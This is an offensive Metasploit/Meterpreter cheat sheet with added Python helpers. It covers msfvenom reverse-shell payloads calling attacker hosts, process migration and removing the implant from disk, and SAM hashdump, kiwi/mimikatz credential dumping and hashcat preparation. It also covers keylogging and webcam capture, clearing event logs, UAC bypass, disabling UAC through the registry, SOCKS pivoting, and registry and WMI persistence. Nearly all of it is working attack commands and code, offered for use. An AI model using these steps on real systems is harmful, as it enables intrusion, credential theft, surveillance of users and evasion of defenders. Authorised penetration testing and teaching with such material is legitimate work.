Metasploit
Port Scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
run
DNS Enumeration
use auxiliary/gather/dns_enum
set DOMAIN target.tgt
run
Host FTP Server
use auxiliary/server/ftp
set FTPROOT /tmp/ftproot
run
Proxy Server
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route; when several routes match, the most specific one (longest prefix) wins.
Use proxychains configured for socks4 to route any application's traffic through a Meterpreter session.
#compromised host has IP 10.10.120.20 and is Meterpreter session 4; route its 10.10.120.0/24 subnet through that session
route add 10.10.120.0/24 4
use auxiliary/server/socks_proxy
set VERSION 4a
set SRVPORT 9050
run
#then add "socks4 127.0.0.1 9050" to /etc/proxychains.conf and prefix tools with proxychains (e.g. proxychains nmap -sT -Pn 10.10.120.20; SOCKS carries TCP only, so use connect scans and skip ICMP)
msfvenom
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them.
List Payloads
msfvenom -l payloads
Basic Examples
msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options
--help-formats #List available output formats
exe #Executable
pl #Perl
rb #Ruby
raw #Raw Shellcode
c #C Code
Encoders
See all encoders
msfvenom -l encoders
Basic Example:
msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Note: encoders exist to avoid bad characters in an exploit buffer, not to evade AV; a shikata_ga_nai-encoded Meterpreter is widely signatured regardless of iteration count.
Meterpreter
Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used.
Remember to check all available commands running the help command once a Meterpreter session has started.
Post Exploitation Modules Reference
https://www.offensive-security.com/metasploit-unleashed/post-module-reference/
Core commands
background : Backgrounds the current session
exit : Terminates the Meterpreter session
guid : Gets the session GUID (Globally Unique Identifier)
help : Displays the help menu
info : Displays information about a Post module
irb : Opens an interactive Ruby shell on the current session
load : Loads one or more Meterpreter extensions
migrate : Allows you to migrate Meterpreter to another process
run : Executes a Meterpreter script or Post module
sessions : Quickly switch to another session
File system commands
cd : Changes directory
ls : Lists files in the current directory (dir will also work)
pwd : Prints the current working directory
edit : Edits a file
cat : Shows the contents of a file on the screen
rm : Deletes the specified file
search : Searches for files
upload : Uploads a file or directory
download : Downloads a file or directory
Networking commands
arp : Displays the host ARP (Address Resolution Protocol) cache
ifconfig : Displays network interfaces available on the target system
netstat : Displays the network connections
portfwd : Forwards a local port to a remote service
route : Allows you to view and modify the routing table
System commands
clearev : Clears the event logs
execute : Executes a command
getpid : Shows the current process identifier
getuid : Shows the user that Meterpreter is running as
kill : Terminates a process
pkill : Terminates processes by name
ps : Lists running processes
reboot : Reboots the remote computer
shell : Drops into a system command shell
shutdown : Shuts down the remote computer
sysinfo : Gets information about the remote system, such as OS
Others Commands (these will be listed under different menu categories in the help menu)
idletime : Returns the number of seconds the remote user has been idle
keyscan_dump : Dumps the keystroke buffer
keyscan_start : Starts capturing keystrokes
keyscan_stop : Stops capturing keystrokes
screenshare : Allows you to watch the remote user's desktop in real time
screenshot : Grabs a screenshot of the interactive desktop
record_mic : Records audio from the default microphone for X seconds
webcam_chat : Starts a video chat
webcam_list : Lists webcams
webcam_snap : Takes a snapshot from the specified webcam
webcam_stream : Plays a video stream from the specified webcam
getsystem : Attempts to elevate your privilege to that of local system
hashdump : Dumps the contents of the SAM database
Modules
Kiwi Commands
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitrary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.
New Meterpreter Session Steps
Assuming you gained access, inserted an AV path exception, wrote the implant to disk and executed it to catch your callback:
getuid #see your user context
getpid #identify the pid you are running as (should be the pid of your msfvenom implant, whatever you named it)
getprivs #see enabled process privileges
ps #view the whole process list and pick an svchost.exe process in the same user context and the same architecture (x86/x64) as your current process; note its pid
migrate XXXX #migrate to the pid of that svchost.exe process
getpid #confirm the new pid
ps #ensure it is the correct process
del /path/to/implant #remove the implant artifact from disk (rm is the same command; do this only after migrating, the file is locked while it runs)
Now you are running as a thread in the address space of the svchost.exe process.
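Picking the migration target by eye from a long ps listing is error-prone, so here is an added helper (not part of the original page or of Metasploit) that parses a pasted Meterpreter `ps` listing and returns svchost.exe pids that match the current process's user and architecture, same-desktop-session candidates first. The process table is a constructed sample, not output from a real target; the pids, the LAB\alice account and met.exe are assumptions.

```python
import re

# Constructed sample of Meterpreter "ps" output (not captured from a real
# target); column layout follows the stdapi process list.
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System            x64   0
 688   560   svchost.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 2044  688   svchost.exe       x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
 3120  3040  svchost.exe       x64   1        LAB\alice            C:\Windows\System32\svchost.exe
 3322  3040  svchost.exe       x86   1        LAB\alice            C:\Windows\SysWOW64\svchost.exe
 4410  3040  explorer.exe      x64   1        LAB\alice            C:\Windows\explorer.exe
 5120  4410  met.exe           x64   1        LAB\alice            C:\Users\alice\Downloads\met.exe
"""

# Rows without User/Path (kernel and protected processes) do not match and
# are skipped; they are not migration targets anyway.
PS_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)\s+(?P<arch>x86|x64)\s+"
    r"(?P<session>\d+)\s+(?P<user>.+?)\s+(?P<path>[A-Za-z]:\\.+?)\s*$"
)


def parse_ps(text):
    """One dict per process row that carries arch, session, user and path."""
    procs = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m:
            d = m.groupdict()
            for k in ("pid", "ppid", "session"):
                d[k] = int(d[k])
            procs.append(d)
    return procs


def migration_candidates(text, current_pid, target_name="svchost.exe"):
    """Pids of target_name processes sharing the current process's user and
    architecture. Same desktop session sorts first, then lowest pid."""
    procs = parse_ps(text)
    me = next((p for p in procs if p["pid"] == current_pid), None)
    if me is None:
        raise ValueError(f"pid {current_pid} not found in process list")
    cands = [
        p for p in procs
        if p["name"].lower() == target_name
        and p["pid"] != current_pid
        and p["user"] == me["user"]      # same token context, so migrate cannot fail on access
        and p["arch"] == me["arch"]      # an x64 Meterpreter cannot be injected into a WOW64 host
    ]
    cands.sort(key=lambda p: (p["session"] != me["session"], p["pid"]))
    return [p["pid"] for p in cands]


if __name__ == "__main__":
    print(migration_candidates(SAMPLE_PS, 5120))
```

In the sample the x86 svchost.exe under SysWOW64 and the two SYSTEM-owned instances are rejected for the implant running as LAB\alice, leaving pid 3120; once you are SYSTEM the same function returns the SYSTEM-owned services instead.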
Accessing the Filesystem
Common commands include
cd - change directory on the target
cat - read and output to stdout the contents of a file
del - delete a file on the target
edit - edit a file with vim
ls - list files in current directory
mkdir - make a directory on the target system
rmdir - remove directory on the target system
File collection with Meterpreter
Use the download and upload commands. Ensure you escape the Windows backslashes (each "\" becomes "\\").
Example:
download C:\\Users\\Administrator\\Desktop\\secret.txt
Harvest Credentials
One way to try to harvest some credentials is with the hashdump module (requires SYSTEM):
run post/windows/gather/hashdump
Each output line is in the following format (the second field is the account's RID, e.g. 500 for the built-in Administrator, not the full SID):
Username:RID:LM hash:NTLM hash:::
Another method that can yield more credentials (especially on a domain controller) is:
run post/windows/gather/credentials/credential_collector
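The hashdump format above is worth triaging automatically before anything goes to a cracker. The following is an added example, not code from the page or from Metasploit: it parses pasted hashdump output, flags blank passwords, LM hashes that are still stored, and accounts sharing one NT hash, and emits the `user:hash` lines that `hashcat -m 1000 --username` accepts. The dump is a constructed sample (account names and RIDs are made up; the NT hash is the well-known hash of "password").

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM half-pair for "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed sample in the Username:RID:LM:NT::: layout (not from a real host).
SAMPLE_DUMP = """
[*] Obtaining the boot key...
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[+] Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
[+] legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

PREFIX = re.compile(r"^\[[*+!-]\]\s*")  # msfconsole status markers
HASH_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_hashdump(text):
    """One dict per account record; status lines and noise are ignored."""
    out = []
    for raw in text.splitlines():
        line = PREFIX.sub("", raw.strip())
        m = HASH_LINE.match(line)
        if m:
            d = m.groupdict()
            d["rid"] = int(d["rid"])
            d["lm"], d["nt"] = d["lm"].lower(), d["nt"].lower()
            out.append(d)
    return out


def triage(entries):
    """What to look at first: blank passwords (log in directly), stored LM
    hashes (crack in minutes), and NT hashes shared across accounts (reuse)."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "builtin_admin": [e["user"] for e in entries if e["rid"] == 500],
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt": {h: u for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
    }


def to_hashcat(entries):
    """user:nthash lines for `hashcat -m 1000 --username`; blank passwords skipped."""
    return [f'{e["user"]}:{e["nt"]}' for e in entries if e["nt"] != EMPTY_NT]


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_DUMP)
    print(triage(recs))
    print("\n".join(to_hashcat(recs)))
```

Accounts sharing one NT hash are the cheap win: cracking (or passing) a single hash covers all of them, and a local account that shares a hash with a domain service account is a common lateral-movement path.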
Execute a program
The execute command allows us to start remote processes.
execute flags:
-f The executable to run
-H Create the process hidden from view
-a Arguments to pass to the command
-i Interact with the process after creating it
-m Execute from memory
-t Execute process with currently impersonated thread token
-s Execute process in a given session as the session user
Regarding the last option, -s, we can find out the available sessions by using the enumdesktops command. The following example does that and then executes calc.exe on session 1:
meterpreter> enumdesktops
Desktops
--------
Session Station Name
1 WinSta0 Default
1 WinSta0 Winlogon
meterpreter> execute -s 1 -f calc.exe
Post Modules for Windows Survey
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/checkvm
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/credentials/credential_collector
**ENSURE SYSTEM before running
-----------------------------------------------------------------------
**ENSURE you migrate to a user process before running dumplinks**
meterpreter > run post/windows/manage/migrate
meterpreter > run post/windows/gather/dumplinks
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_applications
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_logged_on_users
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_shares
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/enum_snmp
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/hashdump
**ENSURE SYSTEM before running
-----------------------------------------------------------------------
meterpreter > run post/windows/gather/usb_history
-----------------------------------------------------------------------
msf > use post/multi/recon/local_exploit_suggester
set SESSION X
set SHOWDESCRIPTION true
run
-----------------------------------------------------------------------
msf > use post/windows/recon/outbound_ports
winenum: Windows built-in enumeration script (a legacy Meterpreter script; the post modules above are the maintained replacement)
from your meterpreter prompt:
meterpreter> run winenum
This will use net, netsh, and wmic commands to enumerate the target machine.
Note: each individual command in this script has its output stored at the path printed in the line starting with 'Output of each individual command is saved to '.
Clearing the Event Log
from a meterpreter prompt
meterpreter> clearev
Note: clearev wipes the Application, System and Security logs outright; clearing the Security log itself records event 1102 ("The audit log was cleared"), which is an obvious indicator to defenders.
Meterpreter Extensions
kiwi module
load kiwi
help kiwi
Note: the creds_* commands need SYSTEM (run getsystem first) and a Meterpreter whose architecture matches the OS; on an x64 host migrate to an x64 process before loading kiwi, since the x86 build cannot read x64 LSASS correctly.
Powershell Extension
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS >
Powershell Commands from Meterpreter
run a powershell command as a "oneshot" from a meterpreter shell
execute -if powershell.exe -a "dir"
execute -if powershell.exe -a "net group"
execute -if powershell.exe -a 'net user /domain'
Metasploit impersonate (incognito)
load incognito
list_tokens -g
impersonate_token "BUILTIN\\Administrators"
(double the backslash in the token name, as with file paths)
Upgrade shell to meterpreter
use post/multi/manage/shell_to_meterpreter
set SESSION <shell session id>
set LHOST <your ip>
set LPORT <port>
run
Shortcut for the same thing from msfconsole: sessions -u <shell session id>
Firefox Post Exploitation
use post/multi/gather/firefox_creds
Can be run as a non-administrator or as admin; registry information is only pulled when running as admin.
Routing
Set route
route add <subnet / host ip> <subnetmask> <session id>
route print #verify the table
Autoroute module
use post/multi/manage/autoroute
Run autoroute (legacy Meterpreter script form)
run autoroute -s 10.100.11.0/24
Create port forward (run from the Meterpreter session that can reach the remote host)
portfwd add -l <LOCAL PORT> -p <REMOTE PORT> -r <REMOTE HOST>
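The Proxy Server section and this Routing section both rely on the same rule: traffic is sent through whichever route matches the destination, and with overlapping routes the most specific prefix wins. The following added example (not from the page or from Metasploit) reproduces that selection in Python over a constructed route table so you can predict which session a packet will take before running proxychains, and renders the matching resource script and proxychains entry. The session ids 2 and 7 and the extra routes are assumptions; only 10.10.120.0/24 via session 4 comes from the page.

```python
import ipaddress

# Constructed route table in "route add <subnet> <session>" order (session ids made up).
ROUTES = [
    ("10.10.120.0/24", 4),      # the pivot's subnet via session 4, as on the page
    ("10.10.0.0/16", 2),        # a wider route through a second (assumed) pivot
    ("10.10.120.128/25", 7),    # a more specific route added later (assumed)
]


def best_route(dst, routes=ROUTES):
    """Session id whose route most specifically matches dst, or None when no
    route matches (traffic then leaves via the local stack). Mirrors the
    most-specific-route rule of Metasploit's routing table: among matching
    routes the longest prefix wins, independent of the order they were added."""
    addr = ipaddress.ip_address(dst)
    best_sid, best_len = None, -1
    for cidr, sid in routes:
        net = ipaddress.ip_network(cidr, strict=False)
        if addr in net and net.prefixlen > best_len:
            best_sid, best_len = sid, net.prefixlen
    return best_sid


def msf_pivot_script(routes=ROUTES, srvport=9050, version="4a"):
    """The page's msfconsole commands as a resource script
    (save as pivot.rc and load with `msfconsole -r pivot.rc` or `resource pivot.rc`)."""
    lines = [f"route add {cidr} {sid}" for cidr, sid in routes]
    lines += [
        "use auxiliary/server/socks_proxy",
        f"set VERSION {version}",
        f"set SRVPORT {srvport}",
        "run -j",                       # run as a background job so the console stays usable
    ]
    return "\n".join(lines) + "\n"


def proxychains_line(srvport=9050, version="4a"):
    """Matching entry for the [ProxyList] section of /etc/proxychains.conf."""
    family = "4" if version.startswith("4") else "5"
    return f"socks{family} 127.0.0.1 {srvport}"


if __name__ == "__main__":
    for ip in ("10.10.120.20", "10.10.120.200", "10.10.3.9", "192.168.1.1"):
        print(ip, "->", best_route(ip))
    print(msf_pivot_script())
    print(proxychains_line())
```

Note that 10.10.120.200 goes through session 7 even though the /24 via session 4 was added first; if a scan through proxychains reaches the wrong host, check `route print` for an overlapping, more specific route before blaming the SOCKS server.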
UAC Escalation
use exploit/windows/local/bypassuac_windows_store_reg
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.10.10
set LPORT 8080
set SESSION 2
run
Requires that the session user is already a member of the local Administrators group (a medium-integrity admin token); a UAC bypass does not escalate a standard user.
Change UAC to not Notify
Need to be admin (elevated), as these are HKLM values
#check registry key first
Get-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
#look for:
ConsentPromptBehaviorAdmin #default 5 = prompt for consent for non-Windows binaries; 2 = always prompt on the secure desktop; 0 = elevate without prompting
ConsentPromptBehaviorUser #default 3 = prompt for credentials; 1 = prompt for credentials on the secure desktop; 0 = automatically deny elevation
#set ConsentPromptBehaviorAdmin to 0 if it is anything else
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
Disable LUA
EnableLUA specifies whether Windows User Account Control (UAC) notifies the user when programs try to make changes to the computer. UAC was formerly known as Limited User Account (LUA).
#check registry key first
Get-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
#look for:
EnableLUA 1
#now set to 0
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0
#a restart is needed before the change applies, so ensure WMI Event Subscription or registry persistence is set up first
Persistence Modules
Registry Run Key
use exploit/windows/local/registry_persistence
Ensure to set RUN_NAME at a minimum
WMI Event Subscription Persistence
use exploit/windows/local/wmi_persistence
Ensure failed logon auditing is enabled on the target. To enable:
auditpol.exe /set /subcategory:Logon /failure:Enable
The Event ID for a failed logon is 4625
Ensure to set USERNAME_TRIGGER and SESSION at a minimum (with the default EVENT persistence method, a failed logon attempt with the trigger username is what fires the payload)
Cannot be run as SYSTEM or as a standard user; needs to be run as ADMINISTRATOR